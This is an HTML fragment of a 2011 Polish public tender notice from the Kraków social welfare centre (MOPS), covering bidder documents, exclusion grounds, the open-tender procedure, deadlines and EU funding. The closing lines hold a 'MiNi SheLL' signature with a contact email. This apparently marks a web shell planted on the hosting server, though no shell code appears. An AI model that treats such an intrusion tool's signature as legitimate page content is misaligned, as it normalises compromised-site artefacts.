<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć takich kwestii jak: termin realizacji zamówienia, warunki płatności oraz miejsce realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.krakow.pl/?dok_id=30232<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS w Krakowie, ul. Józefińska 14, pok. 002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2011 godzina 10:00, miejsce: Dziennik podawczy MOPS w Krakowie, ul. Józefińska 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest finansowany ze środków UE w ramach projektu Pora na aktywność.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com